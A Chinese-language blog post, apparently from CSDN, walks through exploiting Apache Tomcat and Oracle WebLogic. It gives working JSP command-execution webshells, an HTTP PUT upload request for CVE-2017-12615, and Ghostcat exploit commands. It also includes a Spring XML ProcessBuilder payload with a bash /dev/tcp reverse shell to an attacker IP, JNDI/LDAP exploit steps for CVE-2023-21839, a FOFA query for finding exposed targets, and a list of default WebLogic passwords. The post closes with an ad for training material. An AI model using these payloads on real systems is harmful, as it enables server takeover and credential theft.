1、Tomcat:猫咪虽可爱,安全要牢记!
弱口令:一不小心,后门大开
影响版本:所有版本都得注意,安全无小事!
漏洞复现:还在用弱口令?黑客笑了!用哥斯拉(或者你喜欢的任何木马生成器)生成一个木马,分分钟上传getshell。
遇到弹窗?点【取消】就对了,别慌!
页面提示很明显了,去 Tomcat 的 conf 目录下,找到 tomcat-users.xml 文件。
看这里!红色框框里的代码,红框1是你的密码(如果你设置了的话),没设置就像红框2一样空空如也。username 是账户,password 是密码,记住了吗?
接下来,用你最爱的姿势(哥斯拉)生成木马。
得到 ws.jsp 木马文件,先压缩成 ws.zip,再压缩成 ws.war,上传!
访问一下,看看是不是上传成功了。
/ws 解压后是 ws.jsp,所以访问 ws/ws.jsp。
哥斯拉成功连上,接下来就是你的表演时间了!
文件包含漏洞(CVE-2020-1938):Ghostcat 幽灵猫,防不胜防!
漏洞描述:Tomcat 默认开启的 AJP 连接器,本意是方便和其他 Web 服务器交互,结果却成了黑客的突破口。通过恶意 AJP 请求,黑客可以读取甚至包含 Web 应用根目录下的任意文件。如果再配合文件上传漏洞,上传个任意格式的文件,就能直接 RCE (Remote Code Execution) 了!记住,只有开启 AJP 服务且对外暴露时,才受此漏洞影响(Tomcat 默认开启 AJP 并绑定到 0.0.0.0/0)。
影响范围
Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x前提条件:
Tomcat 开启了 AJP Connector,并且黑客能访问 AJP Connector 服务端口 (默认 8009)。
漏洞原理
Tomcat 有两个 Connector:HTTP (默认 8080) 和 AJP (默认 8009)。AJP 比 HTTP 更优化,常用于反向代理、集群等场景。这个漏洞就是因为 Tomcat AJP 协议的缺陷,让黑客可以通过构造特定参数,读取 Webapps 下的任意文件,甚至包含任意文件。如果再配合文件上传点,上传图片马,就能 get shell 了!
漏洞危害:
黑客可以读取 Tomcat 所有 Webapp 目录下的任意文件,包括配置文件、源代码等敏感信息。更可怕的是,如果你的网站有文件上传功能,黑客可以先上传一个包含恶意 JSP 脚本的文件(可以是任意类型的文件,比如图片),然后利用 Ghostcat 漏洞包含这个文件,直接执行代码!
漏洞复现
1、下载有漏洞的 Tomcat 版本:https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip
2、安装 JDK,配置环境变量(不会的自行 Google)。
3、启动 Tomcat,运行 Tomcat 目录 /bin 文件夹下的 startup.bat。
任意文件读取
读取 Webapps 目录下的任何文件,比如 WEB-INF/web.xml:
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xml任意文件包含
1、先上传一个包含恶意代码的文件到 Webapps 目录,比如 test.txt:
test.txt
<% out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine()); %>2、访问这个文件,确保它能被访问到。
3、执行命令:
python3 cve-2020-10487-v1.py 192.168.1.9 -p 8009 -f exec.txt --rce 1文件上传漏洞(CVE-2017-12615):PUT 方法惹的祸
漏洞原理
如果 Tomcat 运行在 Windows 上,并且启用了 HTTP PUT 请求方法,黑客就可以构造请求,上传包含任意代码的 JSP 文件,然后服务器就会执行这些代码!
影响范围:
Tomcat 7.0.0 - 7.0.81
漏洞描述:这个漏洞是因为 Tomcat 默认配置中,readonly参数被设置为false。
漏洞复现:
用 Vulhub 搭建靶场,一键搞定!
可以看到readonly值为false。
发送 PUT 请求:
PUT /1.jsp/ HTTP/1.1 Host: your-ip:8080 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5 <% java.io.InputStream is = Runtime.getRuntime() .exec(request.getParameter("command")) .getInputStream(); int a = -1; byte[] b = new byte[2048]; while ((a = is.read(b)) != -1) { out.print(new String(b)); } %>访问上传的 JSP 文件,执行任意命令!
2、Weblogic:不只是个服务器,还是个高危漏洞集散地!
任意文件读取漏洞:想看啥就看啥,就问你怕不怕!
漏洞原理:通过 URL 就能读取服务器上的任意文件,比如/hello/file.jsp?path=/etc/passwd。
影响范围:
Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3漏洞复现
通过/etc/passwd读取用户信息:
http://xxx:7001/hello/file.jsp?path=/etc/passwd1、读取密文文件
先读取配置文件,拿到加密密钥:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml2、读取加密后的密码
用 Burp Suite 抓包,把密码保存为 .dat 文件:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat把读取的文件内容保存成文件。
3、解密
用这个工具:https://github.com/TideSec/Decrypt_Weblogic_Password
远程命令执行漏洞(CVE-2020-14882/14883):不登录也能为所欲为!
漏洞原理
CVE-2020-14883 允许未授权用户接管 WebLogic Server Console,CVE-2020-14882 允许在 Console 上执行任意代码。组合起来,黑客可以通过一个 GET 请求,在远程 WebLogic 服务器上以任意用户身份执行命令!
影响范围
WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0漏洞复现
构造 XML 文件:
<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[touch /tmp/success]]></value> </list> </constructor-arg> </bean> </beans>访问这个 XML 文件,服务器会在 /tmp 目录下生成 success 文件。
同理,修改 XML 文件中的<![CDATA[touch /tmp/success]]>为<![CDATA[bash -i >& /dev/tcp/攻击机IP/4444 0>&1]]>即可反弹 shell!
未授权远程代码执行漏洞(CVE-2023-21839):T3/IIOP 协议的噩梦
漏洞原理
WebLogic 的 IIOP/T3 协议存在缺陷,允许未授权的攻击者通过 IIOP/T3 协议网络访问存在安全风险的 WebLogic Server。利用成功后,黑客可以接管 WebLogic Server,执行任意命令,导致服务器沦陷或敏感数据泄露。
影响范围:
12.2.1.2.0 12.2.1.1.0 12.2.1.3.0 12.2.1.0.0 12.2.1.4.0 14.1.1.0.0 12.1.2.0.0 12.1.3.0.0 10.3.6.0FOFA 指纹
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"Vulfocus 已经集成了该漏洞环境:
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release漏洞环境:使用 Vulhub 搭建。
漏洞复现:
下载 JNDIExploit:https://github.com/WhiteHSBG/JNDIExploit
1、搭建 LDAP 服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i kali的ip2、Kali 开启 NC 监听
nc -lvvp 99993、下载 EXP
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
执行命令:
java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口4、成功反弹 shell,监听成功!
Weblogic 常用弱口令
赶紧去测测你的 Weblogic 是不是裸奔!
weblogic/Oracle@123 system/password weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem weblogic/weblogic123 weblogic/weblogic2 system/password weblogic/weblogic admin/security joe/password mary/password system/security wlcsystem/wlcsystem wlpisystem/wlpisystem guest/guest portaladmin/portaladmin system/system WebLogic/WebLogic ## 学习资源 如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你 知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。 #### 1、知识库价值 深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。 广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。 实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。 #### 2、 部分核心内容展示 360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。  360智榜样学习中心独家《网络攻防知识库》采用**由浅入深、攻防结合**的讲述方式,既夯实基础技能,更深入高阶对抗技术。 内容组织紧密结合攻防场景,辅以大量**真实环境复现案例、自动化工具脚本及配置解析**。通过**策略讲解、原理剖析、实战演示**相结合,是你学习过程中好帮手。 **1、网络安全意识**  **2、Linux操作系统**  **3、WEB架构基础与HTTP协议**  **4、Web渗透测试**  **5、渗透测试案例分享**  **6、渗透测试实战技巧**  **7、攻防对战实战**  **8、CTF之MISC实战讲解**  ## 3、适合学习的人群 **一、基础适配人群** 1. **零基础转型者**:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链; 2. **开发/运维人员**:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业; 3. **应届毕业生**:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期; **二、能力提升适配** 1、**技术爱好者**:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者; 2、**安全从业者**:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力; 3、**合规需求者**:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员; 因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】 